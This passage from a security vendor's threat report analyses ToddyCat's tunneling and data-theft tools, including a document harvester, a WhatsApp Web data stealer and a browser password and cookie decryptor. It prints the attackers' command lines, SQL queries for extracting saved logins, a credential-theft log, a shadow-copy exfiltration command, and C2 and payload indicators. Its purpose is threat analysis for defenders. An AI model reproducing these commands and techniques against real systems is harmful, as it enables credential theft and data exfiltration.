1384. <p>After copying the files to the target host, the attackers create a service with an arbitrary name, which is started via the following command.</p><pre class="crayon-plain-tag">c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini</pre><p>
1385. This starts the FRP client with the configuration file &#8220;tc.ini&#8221;. The traffic is then routed from C2 through this tool.</p>
1386. <h2 id="data-collection-tools">Data collection tools</h2>
1387. <h3 id="cuthead-for-data-collection">Cuthead for data collection</h3>
1388. <p>Recently, ToddyCat started using a new tool we named <strong>cuthead </strong>to search for documents. The name originated from the &#8220;file description&#8221; field of the sample we found. It is a .NET compiled executable designed to search for files and store those it finds inside an archive. The tool can search for specified file extensions or words in the file name.</p>
1389. <p>Cuthead tool accepts the following arguments:</p><pre class="crayon-plain-tag">fkw.exe &lt;date&gt; &lt;extensions&gt; [keywords]</pre><p>
1390. <ul>
1391. <li><strong>Date:</strong> the date when the file was last modified, in <strong>yyyyMMdd </strong> The search looks for files modified on that date or later</li>
1392. <li><strong>Extensions</strong>: a string without spaces that contains file extensions separated by semicolons</li>
1393. <li><strong>Keywords</strong>: a string without spaces that contains semicolon-delimited words to look for in file names</li>
1394. </ul>
1395. <p>Here is an example of a <strong>cuthead</strong> launch command.</p><pre class="crayon-plain-tag">"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx</pre><p>
1396. In this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.</p>
1397. <p>Once launched, the tool processes the command-line parameters and begins a recursive search for files in the file system on all available drives (<strong><a href="https://attack.mitre.org/techniques/T1005/" target="_blank" rel="noopener">T1005 Data from Local System</a></strong>). Folders that contain the following substrings are excluded from the search.</p><pre class="crayon-plain-tag">$
1398. Windows
1399. Program Files
1400. Programdata
1401. Application Data
1402. Program Files (x86)
1403. Documents and Settings</pre><p>
1404. Also, the files are excluded from the search if they meet the following criteria:</p>
1405. <ul>
1406. <li>The file size is greater than 50 Mb (52428800 bytes).</li>
1407. <li>The file extensions do not match those specified in the command-line parameters.</li>
1408. <li>The names do not contain the keywords specified in the command-line parameters.</li>
1409. </ul>
1410. <p>A list of files found by the search is passed to the function that creates ZIP archives with the password &#8220;Unsafe404&#8221;. In different versions of the tool, this function has different names but the same purpose. The open-source tool <a href="https://github.com/icsharpcode/SharpZipLib" target="_blank" rel="noopener">icsharpcode/SharpZipLib</a> v. 0.85.4.369 is used for creating archives (<strong><a href="https://attack.mitre.org/techniques/T1560/002/" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
1411. <p>Several later variants of cuthead were found with all required options – a list of file extensions and a last modified date that was typically within the previous 7 days – hardcoded within the software. We believe this was done to automate the collection process.</p>
1412. <h3 id="waexp-whatsapp-data-stealer">WAExp: WhatsApp data stealer</h3>
1413. <p>This tool is written in .NET and designed to search for and collect browser local storage files containing data from the web version of WhatsApp (web.whatsapp.com). For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data. Attackers can gain access to this data by copying the browser&#8217;s local storage files.</p>
1414. <p>The executable accepts the following arguments.</p><pre class="crayon-plain-tag">app.exe [check|copy|start] [remote]</pre><p>
1415. <strong>Check</strong>: checks the presence of data on the host.<br />
1416. <strong>Copy</strong>: copies data it finds to the temporary folder.<br />
1417. <strong>Start:</strong> first, copies the data to the temporary folder and then, packs the data into an archive file.<br />
1418. <strong>Remote</strong>: the name of the remote host.</p>
1419. <p>When executed with &#8220;<strong>check</strong>&#8220;, the tool begins searching for user folders. If &#8220;<strong>remote</strong>&#8221; is specified, user folders are searched along &#8220;<strong>\\[remote]\C$\users\</strong>&#8220;. If it is not specified, the malware uses the environment variable <strong>%SystemDrive%</strong> value, retrieving the name of the system drive from it. It then searches inside the Users folder on that drive. Next, the tool goes through all folders in this directory except the following default ones.</p><pre class="crayon-plain-tag">All Users
1420. Default User
1421. Default
1422. Public</pre><p>
1423. After it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge, and Mozilla local storages.</p>
1424. <p>ForChrome, the tool opens <strong>&lt;User&gt;\Appdata\local\Google\</strong> and for Edge, <strong>&lt;User&gt;\Appdata\local\Microsoft\Edge\</strong>. Inside these, it looks for a folder with the following name inside the subfolders.</p><pre class="crayon-plain-tag">https_web.whatsapp.com_0.indexeddb.leveldb</pre><p>
1425. For Mozilla, the tool opens<strong>&lt;User&gt;\Appdata\roaming\</strong> and looks for a folder with the following name inside the subfolders:</p><pre class="crayon-plain-tag">https+++web.whatsapp.com</pre><p>
1426. Roaming may contain several Mozilla folders with web.whatsapp.com storage data. For example,Mozilla Thunderbird can store this data too, as it supports a WhatsApp plugin.</p>
1427. <div id="attachment_112452" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112452" class="size-large wp-image-112452" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1024x262.png" width="1024" height="262" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1024x262.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-300x77.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-768x196.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-740x189.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1096x280.png 1096w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-800x204.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06.png 1131w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112452" class="wp-caption-text">WAExp &#8220;check&#8221; output with results for Chrome, Edge, Firefox and Thunderbird</p></div>
1428. <p>In the image above, you can see the output of the tool running with the &#8220;<strong>check</strong>&#8221; parameter. It shows storage files for <strong>Chrome</strong>, <strong>Edge</strong> and <strong>Firefox</strong>, as well as the <strong>Thunderbird</strong> mail client detected on the host.</p>
1429. <p>When executed with the &#8220;<strong>copy</strong>&#8221; parameter, WAExp copies all whatsapp.com data storage files in the system to the following temporary storage folder.</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default\</pre><p>
1430. The last parameter that the tool uses is <strong>&#8220;start&#8221;</strong>. It gathers target files inside a temporary folder, as described in the <strong>copy</strong> function, and packs these into an archive with the help of the <strong>System.IO.Compression.ZipFile</strong> module (<strong><a href="https://attack.mitre.org/techniques/T1560/002/" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
1431. <p>It saves the archive file under a name consisting of the word &#8216;Default&#8217; and a timestamp, without extension, at the following path:</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default-yyyyMMdd-hhmmss</pre><p>
1432. After that, it deletes the temporary folder, along with the web browsers&#8217; and other clients&#8217; folders containing <strong>web.whatsapp.com</strong> data.</p>
1433. <p>The image below shows an example of WAExp output when run with the various startup parameters.</p>
1434. <div id="attachment_112453" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112453" class="size-large wp-image-112453" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-1024x510.png" alt="WAExp output for its various command-line parameters" width="1024" height="510" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-1024x510.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-768x382.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-703x350.png 703w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-740x368.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-563x280.png 563w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-800x398.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07.png 1069w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112453" class="wp-caption-text">WAExp output for its various command-line parameters</p></div>
1435. <p>The operations shown above collect <strong>Chrome</strong> data and generate an archive, whose contents are shown below.</p>
1436. <div id="attachment_112454" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112454" class="size-large wp-image-112454" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-1024x398.png" alt="Archive file containing data stolen by WAExp" width="1024" height="398" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-1024x398.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-300x117.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-768x299.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-900x350.png 900w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-740x288.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-720x280.png 720w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08-800x311.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160515/ToddyCat_data_collection_and_tunneling_08.png 1046w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112454" class="wp-caption-text">Archive file containing data stolen by WAExp</p></div>
1437. <h3 id="tomberbil-for-stealing-passwords-from-browsers">TomBerBil for stealing passwords from browsers</h3>
1438. <p>In addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all online services that target users have access to. For an adversary with high privileges in the system, one fairly easy way to do this is to decrypt browser data containing cookies and passwords that the user may have saved to autofill authentication forms (<strong><a href="https://attack.mitre.org/techniques/T1555/003/" target="_blank" rel="noopener">T1555.003 Credentials from Password Stores: Credentials from Web Browsers</a></strong>).</p>
1439. <p>There are many open-source tools available for decrypting storage data, one of these being <a href="https://github.com/gentilkiwi/mimikatz/wiki/module-~-dpapi" target="_blank" rel="noopener"><strong>mimikatz</strong></a>. The problem for the adversary is that these are well known to security systems and will immediately raise red flags if detected in the infrastructure.</p>
1440. <p>To avoid detection, attackers have created a range of tools implemented with different technologies and designed for the same purpose: to extract cookies and passwords from <strong>Chrome </strong>and <strong>Edge</strong>. Both browsers use the <a href="https://learn.microsoft.com/en-us/windows/win32/api/dpapi/nf-dpapi-cryptprotectdata" target="_blank" rel="noopener"><strong>CryptProtectData</strong></a> feature from <strong>DPAPI </strong>(Data Protection Application Programming Interface) to encrypt data. It protects data with the current user&#8217;s password and a special encryption master key.</p>
1441. <p>All <strong>TomBerBil </strong>variants work according to the same principle. After starting, the malware begins to enumerate all processes running in the system and search for all instances of <strong>explorer.exe</strong>. It identifies the process users and compiles a list.</p>
1442. <div id="attachment_112455" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112455" class="size-large wp-image-112455" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-1024x302.png" alt="Username identification function" width="1024" height="302" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-1024x302.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-300x88.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-768x227.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-740x218.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-949x280.png 949w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09-800x236.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160601/ToddyCat_data_collection_and_tunneling_09.png 1095w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112455" class="wp-caption-text">Username identification function</p></div>
1443. <p>The image above shows an example of the function that identifies users by process ID. It sends a <strong>WMI </strong>request to the <strong>Win32_Process </strong>class to receive an object whose <strong>processID property </strong>equals the given PID. It then calls the <strong>GetOwner </strong>method, which returns the user and domain name for the process.</p>
1444. <p>After this, the malware searches for the encryption key, stored in the <strong>encrypted_key </strong>field in the following browser <strong>JSON </strong>files.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Local State
1445. %LOCALAPPDATA%\Microsoft\Edge\User Data\Local State</pre><p>
1446. It then impersonates the users it identified and attempts to decrypt the master key using the <strong>CryptUnprotectData</strong> function. To do this, it calls <strong>Unprotect</strong> function from the <strong>System.Security.Cryptography.ProtectedData</strong> package, which, in turn, uses <strong>CryptUnprotectData </strong>function call from Windows DPAPI.</p>
1447. <div id="attachment_112456" style="width: 622px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112456" class="size-full wp-image-112456" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png" alt="Calling the Unprotect function" width="612" height="76" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10.png 612w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160713/ToddyCat_data_collection_and_tunneling_10-300x37.png 300w" sizes="(max-width: 612px) 100vw, 612px" /></a><p id="caption-attachment-112456" class="wp-caption-text">Calling the Unprotect function</p></div>
1448. <p>The image above shows an example of the <strong>Unprotect</strong> function call, which receives an array of bytes obtained from the <strong>encrypted_key</strong> field. The value of <strong>DataProtectionScope.CurrentUser</strong> is passed as the third parameter. This means that the user context of the calling process will be used when decrypting the data. The tool impersonates the users it finds in explorer.exe for this very purpose.</p>
1449. <p>If the decryption is successful, the malware searches for <strong>Login Data</strong> and <strong>\Network\Cookies</strong> files inside the following folders.</p><pre class="crayon-plain-tag">%LOCALAPPDATA%\Google\Chrome\User Data\Default
1450. %LOCALAPPDATA%\Google\Chrome\User Data\Profile *</pre><p>
1451. It copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the following queries.</p><pre class="crayon-plain-tag">SELECT origin_url, username_value, password_value FROM logins
1452. SELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as
1453. expires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies</pre><p>
1454. Data retrieved this way is decrypted with the master key and saved in special files.</p>
1455. <p>Most versions of the malware tool log their actions. Below is an example of a log file that they generate:</p><pre class="crayon-plain-tag">[+] Begin 7/28/2023 1:12:37 PM
1456. [+] Current user SYSTEM
1457. [*] [5516] [explorer] [UserName]
1458. [+] Impersonate user UserName
1459. [+] Current user UserName
1460. [+] Local State File: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Local State
1461. [+] MasterKeyBytes: 6j<...>k=
1462. [>] Profile: C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default
1463. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Login Data to C:\Windows\TEMP\tmpF319.tmp
1464. [+] Delete File C:\Windows\TEMP\tmpF319.tmp
1465. [+] Copy C:\Users\UserName\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFA1F.tmp
1466. [+] Delete File C:\Windows\TEMP\tmpFA1F.tmp
1467. [+] Local State File: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Local State
1468. [+] MasterKeyBytes: fv<...>GM=
1469. [>] Profile: C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default
1470. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Login Data to C:\Windows\TEMP\tmpFCB0.tmp
1471. [+] Delete File C:\Windows\TEMP\tmpFCB0.tmp
1472. [+] Copy C:\Users\UserName\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies to C:\Windows\TEMP\tmpFD5D.tmp
1473. [+] Delete File C:\Windows\TEMP\tmpFD5D.tmp
1474. [+] Recvtoself
1475. [+] Current user SYSTEM
1476. [+] End 7/28/2023 1:12:52 PM</pre><p>
1477. One of the variants mimics <strong>Kaspersky Anti-Virus. </strong>This executable, written in .NET, is named <strong>avpui.exe</strong> (<strong><a href="https://attack.mitre.org/techniques/T1036/005/" target="_blank" rel="noopener">T1036.005 Masquerading: Match Legitimate Name or Location</a></strong>) and contains relevant metadata:</p>
1478. <div id="attachment_112457" style="width: 777px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112457" class="size-full wp-image-112457" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png" alt="Metadata of the tool pretending to be KAV" width="767" height="268" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11.png 767w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11-300x105.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160939/ToddyCat_data_collection_and_tunneling_11-740x259.png 740w" sizes="(max-width: 767px) 100vw, 767px" /></a><p id="caption-attachment-112457" class="wp-caption-text">Metadata of the tool pretending to be KAV</p></div>
1479. <p>Some versions of the tool required specific command-line parameters to start. An example can be seen below:</p>
1480. <div id="attachment_112458" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112458" class="size-large wp-image-112458" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-1024x187.png" alt="A TomBerBil variant started with a parameter" width="1024" height="187" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-1024x187.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-300x55.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-768x140.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-740x135.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12-800x146.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19161007/ToddyCat_data_collection_and_tunneling_12.png 1076w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112458" class="wp-caption-text">A TomBerBil variant started with a parameter</p></div>
1481. <p>In several cases, beside using TomBerBil, the adversary created a shadow copy of the disk and archived the <strong>User Data</strong> file with <a href="https://www.7-zip.org/" target="_blank" rel="noopener">7zip</a> for the further exfiltration.</p><pre class="crayon-plain-tag">wmic shadowcopy call create Volume='C:\'
1482. "cmd" /c c:\Intel\7z6.exe a c:\Intel\1.7z -mx0 -r
1483. \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Users\<username>\AppData\Local\Google\
1484. Chrome\"User Data\"</pre><p>
1485. <h2 id="conclusion">Conclusion</h2>
1486. <p>We looked at several tools that allow the attackers to maintain access to target infrastructures and automatically search for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt to mask their presence in the system.</p>
1487. <p>To protect the organization&#8217;s infrastructure, we recommend adding to the firewall denylist the resources and IP addresses of cloud services that provide traffic tunneling. We also recommend limiting the range of tools administrators are allowed to use for accessing hosts remotely. Unused tools must be either forbidden or thoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required to avoid storing passwords in their browsers, as it helps attackers to access sensitive information. Reusing passwords across different services poses a risk of more data becoming available to attackers.</p>
1488. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
1489. <p><strong>Files</strong></p>
1490. <table width="100%">
1491. <tbody>
1492. <tr>
1493. <td width="60%"><a href="https://opentip.kaspersky.com/1D2B32910B500368EF0933CDC43FDE0B/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1D2B32910B500368EF0933CDC43FDE0B</a></td>
1494. <td width="40%">WAExp</td>
1495. </tr>
1496. <tr>
1497. <td><a href="https://opentip.kaspersky.com/5C2870F18E64A14A64ABF9A56F5B6E6B/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">5C2870F18E64A14A64ABF9A56F5B6E6B</a></td>
1498. <td>WAExp</td>
1499. </tr>
1500. <tr>
1501. <td><a href="https://opentip.kaspersky.com/AFEA0827779025C92CAB86F685D6429A/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">AFEA0827779025C92CAB86F685D6429A</a></td>
1502. <td>cuthead</td>
1503. </tr>
1504. <tr>
1505. <td><a href="https://opentip.kaspersky.com/AFEA0827779025C92CAB86F685D6429A/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">C7D8266C63F8AECA8D5F5BDCD433E72A</a></td>
1506. <td>cuthead</td>
1507. </tr>
1508. <tr>
1509. <td><a href="https://opentip.kaspersky.com/750EF49AFB88DDD52F6B0C500BE9B717/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">750EF49AFB88DDD52F6B0C500BE9B717</a></td>
1510. <td>TomBerBil</td>
1511. </tr>
1512. <tr>
1513. <td><a href="https://opentip.kaspersky.com/853A75364D76E9726474335BCD17E225/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">853A75364D76E9726474335BCD17E225</a></td>
1514. <td>TomBerBil</td>
1515. </tr>
1516. <tr>
1517. <td><a href="https://opentip.kaspersky.com/BA3EF3D0947031FB9FFBC2401BA82D79/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">BA3EF3D0947031FB9FFBC2401BA82D79</a></td>
1518. <td>Krong</td>
1519. </tr>
1520. </tbody>
1521. </table>
1522. <p><strong>legitimate tools</strong></p>
1523. <table width="100%">
1524. <tbody>
1525. <tr>
1526. <td width="60%"><a href="https://opentip.kaspersky.com/4A79A8B1F6978862ECFA71B55066AADD/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">4A79A8B1F6978862ECFA71B55066AADD</a></td>
1527. <td width="40%">FRP client</td>
1528. </tr>
1529. <tr>
1530. <td><a href="https://opentip.kaspersky.com/1F514121162865A9E664C919E71A6F62/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">1F514121162865A9E664C919E71A6F62</a></td>
1531. <td>vpnserver_x64.exe</td>
1532. </tr>
1533. <tr>
1534. <td><a href="https://opentip.kaspersky.com/6F32D6CFAAD3A956AACEA4C5A5C4FBFE/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">6F32D6CFAAD3A956AACEA4C5A5C4FBFE</a></td>
1535. <td>vpnserver_x64.exe</td>
1536. </tr>
1537. <tr>
1538. <td><a href="https://opentip.kaspersky.com/9DC7237AC63D552270C5CA27960168C3/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">9DC7237AC63D552270C5CA27960168C3</a></td>
1539. <td>ngrok.exe</td>
1540. </tr>
1541. <tr>
1542. <td><a href="https://opentip.kaspersky.com/34985FAE5FA8E9EBAA872DE8D0105005/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">34985FAE5FA8E9EBAA872DE8D0105005</a></td>
1543. <td>ngrok.exe</td>
1544. </tr>
1545. </tbody>
1546. </table>
1547. <p><strong>C2 addresses</strong></p>
1548. <table width="100%">
1549. <tbody>
1550. <tr>
1551. <td width="40%"><a href="https://opentip.kaspersky.com/103.27.202.85/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">103.27.202[.]85</a></td>
1552. <td width="60%">&#8211; SSH server</td>
1553. </tr>
1554. <tr>
1555. <td><a href="https://opentip.kaspersky.com/118.193.40.42/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">118.193.40[.]42</a></td>
1556. <td>&#8211; Server from SoftEther VPN</td>
1557. </tr>
1558. <tr>
1559. <td><a href="https://opentip.kaspersky.com/Ha.bbmouseme.com/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">Ha[.]bbmouseme[.]com</a></td>
1560. <td>&#8211; Server from SoftEther VPN</td>
1561. </tr>
1562. </tbody>
1563. </table>
1564. <p><strong>Links</strong></p>
1565. <table width="100%">
1566. <tbody>
1567. <tr>
1568. <td width="75%"><a href="https://opentip.kaspersky.com/http%3A%2F%2Fwww.netportal.or.kr%2Fcommon%2Fcss%2Fmain.js/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/main.js</a></td>
1569. <td width="25%">vpnserver_x64.exe</td>
1570. </tr>
1571. <tr>
1572. <td><a href="https://opentip.kaspersky.com/http%3A%2F%2Fwww.netportal.or.kr%2Fcommon%2Fcss%2Fham.js/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://www.netportal.or[.]kr/common/css/ham.js</a></td>
1573. <td>Hamcore.se2</td>
1574. </tr>
1575. <tr>
1576. <td><a href="https://opentip.kaspersky.com/http%3A%2F%2F23.106.122.5%2Fhamcore.se2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxp://23.106.122[.]5/hamcore.se2</a></td>
1577. <td>Hamcore.se2</td>
1578. </tr>
1579. <tr>
1580. <td><a href="https://opentip.kaspersky.com/https%3A%2F%2Fetracking.nso.go.th%2FUserFiles%2FFile%2F111%2Ftasklist.exe/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</a></td>
1581. <td>vpnserver_x64.exe</td>
1582. </tr>
1583. <tr>
1584. <td><a href="https://opentip.kaspersky.com/https%3A%2F%2Fetracking.nso.go.th%2FUserFiles%2FFile%2F111%2Fhamcore.se2/?utm_source=SL&amp;utm_medium=SL&amp;utm_campaign=SL" target="_blank" rel="noopener">hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</a></td>
1585. <td>Hamcore.se2</td>
1586. </tr>
1587. </tbody>
1588. </table>
1589. ]]></content:encoded>
1591. <wfw:commentRss>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/feed/</wfw:commentRss>
1592. <slash:comments>2</slash:comments>
1595. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content>
